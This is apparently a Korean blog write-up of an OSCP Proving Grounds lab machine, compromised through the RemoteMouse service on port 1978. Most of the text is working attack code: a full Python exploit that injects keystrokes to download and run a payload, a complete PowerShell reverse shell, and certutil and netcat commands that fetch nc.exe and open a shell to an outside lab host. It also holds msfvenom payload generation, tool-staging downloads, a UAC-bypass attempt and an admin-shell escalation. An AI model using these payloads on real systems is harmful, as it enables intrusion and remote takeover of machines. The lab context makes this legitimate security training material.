1.Information Gathering
: Port Scan
data:image/s3,"s3://crabby-images/f4820/f4820613997797caf0e6aec3c40416915a331a5a" alt=""
data:image/s3,"s3://crabby-images/447eb/447ebb8b73452226a2c774522222c92b87d08f0f" alt=""
1978 : RemoteMouse.exe
취약점이 있는 경우 다음과 같은 배너 확인이 가능하단다.
SIN 15win pwd pwd 300 : Indicating that the service requires authentication.
SIN 15win nop nop 300 : Indicating that the service does not require authentication.
테스트해보면
data:image/s3,"s3://crabby-images/b24ea/b24ea8cc7c02461402ae8c944d8d117903426e5a" alt=""
취약함
관련 exploit을 찾아 확인해 보니
data:image/s3,"s3://crabby-images/7844d/7844d37bbcc17b9683b89f2418a394f0dda3dfb1" alt=""
원격으로 계산기 프로그램이 실행된 듯하다.
2. Exploitation
찾은 exploit의 코드를 살펴보면
계산기를 팝업시키는
PopCalc() 함수 확인이 가능하고
해당 부분을 일부 수정해 주면
쉘 획득이 가능하다.
PopCalc() 함수 업데이트 ver.1
#!/usr/bin/python2
from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
from time import sleep
from sys import argv
def Ping(ip):
try:
target = socket(AF_INET, SOCK_STREAM)
target.settimeout(5)
target.connect((ip, 1978))
response=target.recv(1048)
target.close()
if response=="SIN 15win nop nop 300":
return True
else: return False
except:
print("ERROR: Request timed out")
def MoveMouse(x,y,ip):
def SendMouse(command,times,ip):
for x in range(times):
target = socket(AF_INET, SOCK_DGRAM)
target.sendto(command,(ip,1978))
sleep(0.001)
if x>0:
command="mos 5m 1 0"
SendMouse(command,x,ip)
elif x<0:
x=x*-1
command="mos 5m -1 0"
SendMouse(command,x,ip)
if y>0:
command="mos 5m 0 1"
SendMouse(command,y,ip)
elif y<0:
y=y*-1
command="mos 6m 0 -1"
SendMouse(command,y,ip)
def MousePress(command,ip,action="click"):
if action=="down":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" d"),(ip,1978))
elif action=="up":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" u"),(ip,1978))
elif action=="click":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" d"),(ip,1978))
target.sendto((command+" u"),(ip,1978))
else: raise Exception('MousePress: No action named "'+str(action)+'"')
def SendString(string,ip):
for char in string:
target = socket(AF_INET, SOCK_DGRAM)
target.sendto(characters[char],(ip,1978))
sleep(0.5)
class mouse:
leftClick="mos 5R l"
rightClick="mos 5R r"
middleClick="mos 5R m"
characters={
"A":"key 8[ras]116", "B":"key 8[ras]119", "C":"key 8[ras]118", "D":"key 8[ras]113", "E":"key 8[ras]112",
"F":"key 8[ras]115", "G":"key 8[ras]114", "H":"key 8[ras]125", "I":"key 8[ras]124", "J":"key 8[ras]127",
"K":"key 8[ras]126", "L":"key 8[ras]121", "M":"key 8[ras]120", "N":"key 8[ras]123", "O":"key 8[ras]122",
"P":"key 8[ras]101", "Q":"key 8[ras]100", "R":"key 8[ras]103", "S":"key 8[ras]102", "T":"key 7[ras]97",
"U":"key 7[ras]96", "V":"key 7[ras]99", "W":"key 7[ras]98", "X":"key 8[ras]109", "Y":"key 8[ras]108",
"Z":"key 8[ras]111",
"a":"key 7[ras]84", "b":"key 7[ras]87", "c":"key 7[ras]86", "d":"key 7[ras]81", "e":"key 7[ras]80",
"f":"key 7[ras]83", "g":"key 7[ras]82", "h":"key 7[ras]93", "i":"key 7[ras]92", "j":"key 7[ras]95",
"k":"key 7[ras]94", "l":"key 7[ras]89", "m":"key 7[ras]88", "n":"key 7[ras]91", "o":"key 7[ras]90",
"p":"key 7[ras]69", "q":"key 7[ras]68", "r":"key 7[ras]71", "s":"key 7[ras]70", "t":"key 7[ras]65",
"u":"key 7[ras]64", "v":"key 7[ras]67", "w":"key 7[ras]66", "x":"key 7[ras]77", "y":"key 7[ras]76",
"z":"key 7[ras]79",
"1":"key 6[ras]4", "2":"key 6[ras]7", "3":"key 6[ras]6", "4":"key 6[ras]1", "5":"key 6[ras]0",
"6":"key 6[ras]3", "7":"key 6[ras]2", "8":"key 7[ras]13", "9":"key 7[ras]12", "0":"key 6[ras]5",
"\n":"key 3RTN", "\b":"key 3BAS", " ":"key 7[ras]21",
"+":"key 7[ras]30", "=":"key 6[ras]8", "/":"key 7[ras]26", "_":"key 8[ras]106", "<":"key 6[ras]9",
">":"key 7[ras]11", "[":"key 8[ras]110", "]":"key 8[ras]104", "!":"key 7[ras]20", "@":"key 8[ras]117",
"#":"key 7[ras]22", "$":"key 7[ras]17", "%":"key 7[ras]16", "^":"key 8[ras]107", "&":"key 7[ras]19",
"*":"key 7[ras]31", "(":"key 7[ras]29", ")":"key 7[ras]28", "-":"key 7[ras]24", "'":"key 7[ras]18",
'"':"key 7[ras]23", ":":"key 7[ras]15", ";":"key 7[ras]14", "?":"key 7[ras]10", "`":"key 7[ras]85",
"~":"key 7[ras]75", "\\":"key 8[ras]105", "|":"key 7[ras]73", "{":"key 7[ras]78", "}":"key 7[ras]72",
",":"key 7[ras]25", ".":"key 7[ras]27"
}
def PopCalc(ip):
MoveMouse(-5000,3000,ip)
MousePress(mouse.leftClick,ip)
sleep(1)
SendString("powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://192.168.49.120/reverse.ps1')\"",ip)
sleep(1)
SendString("\n",ip)
print("SUCCESS! Process reverse-shell has run on target",ip)
def main():
try:
targetIP=argv[1]
except:
print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1")
exit()
if Ping(targetIP)==True:
PopCalc(targetIP)
else:
print("ERROR: Target machine is not running RemoteMouse")
exit()
if __name__=="__main__":
main()
reverse.ps1
└─# cat reverse.ps1
do {
# Delay before establishing network connection, and between retries
Start-Sleep -Seconds 1
# Connect to C2
try{
$TCPClient = New-Object Net.Sockets.TCPClient('192.168.49.120', 443)
} catch {}
} until ($TCPClient.Connected)
$NetworkStream = $TCPClient.GetStream()
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)
# Writes a string to C2
function WriteToStream ($String) {
# Create buffer to be used for next network stream read. Size is determined by the TCP client recieve buffer (65536 by default)
[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}
# Write to C2
$StreamWriter.Write($String + 'SHELL> ')
$StreamWriter.Flush()
}
# Initial output to C2. The function also creates the inital empty byte array buffer used below.
WriteToStream ''
# Loop that breaks if NetworkStream.Read throws an exception - will happen if connection is closed.
while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
# Encode command, remove last byte/newline
$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
# Execute command and save output (including errors thrown)
$Output = try {
Invoke-Expression $Command 2>&1 | Out-String
} catch {
$_ | Out-String
}
# Write output to C2
WriteToStream ($Output)
}
# Closes the StreamWriter and the underlying TCPClient
$StreamWriter.Close()
popcal() 함수 업데이트 ver.2
................
cmd1='mkdir C:\\Users\\Public\\taku'
#cmd2='bitsadmin /transfer job /download /priority high http://192.168.49.209/nc.exe C:\\Users\\Public\\taku\\nc.exe'
cmd2='certutil -urlcache -f http://192.168.49.209/nc.exe C:\\Users\\Public\\taku\\nc.exe'
cmd3='C:\\Users\\Public\\taku\\nc.exe -e cmd 192.168.49.209 443'
def PopCalc(ip):
MoveMouse(-5000,3000,ip)
MousePress(mouse.leftClick,ip)
sleep(1)
# SendString("powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://192.168.49.209/reverse.ps1')\"",ip)
SendString("cmd.exe",ip)
sleep(1)
SendString("\n",ip)
sleep(1)
SendString(cmd1,ip)
sleep(1)
SendString("\n",ip)
sleep(1)
SendString(cmd2,ip)
sleep(1)
SendString("\n",ip)
sleep(3)
SendString(cmd3,ip)
sleep(1)
SendString("\n",ip)
print("SUCCESS! Process has run on target",ip)
.................
popcal() 어떤 업데이트 버전으로 돌리든 정상 작동하며
data:image/s3,"s3://crabby-images/5ff8d/5ff8d58d0a287b415153c22cd4802e7ec6688a16" alt=""
data:image/s3,"s3://crabby-images/9c6d7/9c6d7e1b40a36995645cc939fbbcbf98e206c3cd" alt=""
data:image/s3,"s3://crabby-images/56798/567980ecac14645530c66371881936f00e1983a8" alt=""
data:image/s3,"s3://crabby-images/d327b/d327b7ee678c232023e3e0cdeb78f64c49d06a66" alt=""
침투 성공
3. Privilege Escalation
시도 1
: privileges check
data:image/s3,"s3://crabby-images/a726d/a726d77e609d902dc56cd5ac551da86559afa2c6" alt=""
SeChangeNotifyPrivilege
: 준비물 세팅
(1) reverse.exe
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.120 LPORT=443 --format exe -o reverse.exe
(2) exploit
https://github.com/turbo/zero2hero/blob/master/main.c
(3) String64.exe
eventvwr.exe
PsExec.exe
SHELL> (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.120/PsExec.exe', 'C:\Users\Public\ps.exe');
SHELL> (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.120/reverse.exe', 'C:\Users\Public\reverse.exe');
SHELL> (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.120/eventvwr.exe', 'C:\Users\Public\eventvwr.exe');
SHELL> (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.120/strings64.exe', 'C:\Users\Public\str64.exe');
data:image/s3,"s3://crabby-images/64011/6401105969645af833a8e7fb520a4ce3ba55de7a" alt=""
data:image/s3,"s3://crabby-images/e6cd8/e6cd854c343547b9c152b4cae04c9a59e2737093" alt=""
ps.exe를 실행해 보면
data:image/s3,"s3://crabby-images/f2b54/f2b542308b482d384c4d9b4ebb4a5b8a6eead406" alt=""
UAC가 활성화되어 있어
현 privilege로는 실행이 불가.
UAC 활성화 여부 확인은 다음과 같다.
C:> reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5 > 이론적으로 5개가 있지만 0,2, 혹은 5로 나뉨
EnableLUA REG_DWORD 0x1 > 1은 UAC가 enabled 되어 있음
PromptOnSecureDesktop REG_DWORD 0x1 > 1은 켜져있음
data:image/s3,"s3://crabby-images/98058/98058f7fd6431bd895a0b71b01da401ee4bed2fb" alt=""
다음으로 윈도우에 기본 설치되어 있는
eventvwr.exe의 설정을 strings64.exe로 확인 후
(autoElevate 여부)
data:image/s3,"s3://crabby-images/a6263/a6263d21ffbedf5e0a9bf4aa502b681b143e36d3" alt=""
data:image/s3,"s3://crabby-images/428b7/428b70e25cb7e3be5924fb54b3d8b827d40dd81a" alt=""
확인되었으니 exploit(준비물 2번)을 조금 수정 후 돌리면 된다.
코드 내 수정이 필요한 부분은 하단의 커맨트 부분 활성화 후
위에서 생성한 reverse.exe를 참조하도록 설정
data:image/s3,"s3://crabby-images/342c9/342c9853fad5263c0efab1adf5a0081253c7e5d7" alt=""
64비트로 컴파일 후
# x86_64-w64-mingw32-gcc main.c -o eventvwr_bypass_64.exe
data:image/s3,"s3://crabby-images/765f6/765f688cbf8f6048e72e2567fd108295a951471f" alt=""
파일들 다 넘기고
리스너 기동 후 실행
PS C:> (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.120/eventvwr_bypass_64.exe', 'C:\Users\Public\exploit.exe')
안 돌아간다.
실패
data:image/s3,"s3://crabby-images/807af/807af3efc41273d5e3313fedd98a5e150fced1fc" alt=""
시도 2
Users 디렉터리 내 숨은 파일 검색
data:image/s3,"s3://crabby-images/105dd/105ddc7dac40fe91d88258dcdf1aea2116a24e69" alt=""
data:image/s3,"s3://crabby-images/158fa/158faa84256b4e8ac141d1159f06e1778ac70030" alt=""
data:image/s3,"s3://crabby-images/7f7ed/7f7edef262e6412067b8a1420170dfb1b79cf213" alt=""
사용자 암호가 base64 형식으로 저장되어 있고
복호화 후 rdektop으로 접속, 들어가보니
내가 했던 수많은 시도들로
창이 백만 개 떠있고 개판이다;;
접속 후 검색해보니 Remote Mouse는
administrator 권한으로 돌아간다고 한다.
설정 프로그램 들어가 세팅에서
Image transfer Folder를 변경 시도,
data:image/s3,"s3://crabby-images/51743/51743dfe83a7c05da2bf2ec84f9c9d7d903c0976" alt=""
변경 시 나오는 에러는 ok 해주고
data:image/s3,"s3://crabby-images/ea163/ea1636491a5d79c314557a1f03cfbee660addd49" alt=""
주소창에 cmd.exe 경로를 입력해 터미널을 실행시키면
data:image/s3,"s3://crabby-images/dfcc9/dfcc93d761e6aca25e520a1b91e26d7d0427d4b3" alt=""
관리자 권한의 터미널이 열린다.
data:image/s3,"s3://crabby-images/f1312/f1312fd036d01fd3fd794aa9aaab5b71458e44b5" alt=""
끝
'OSCP > Proving Ground' 카테고리의 다른 글
16. Wheels (WARM UP) - Linux (XPath 인젝션) (0) | 2022.06.25 |
---|---|
15. Robust (WARM UP) - Windows (SQL인젝션) (4) | 2022.06.15 |
13. Internal (WARM UP) - Windows (0) | 2022.06.12 |
12. Helpdesk (WARM UP) - Windows (0) | 2022.06.11 |
11. Algernon (WARM UP) - Windows (0) | 2022.06.11 |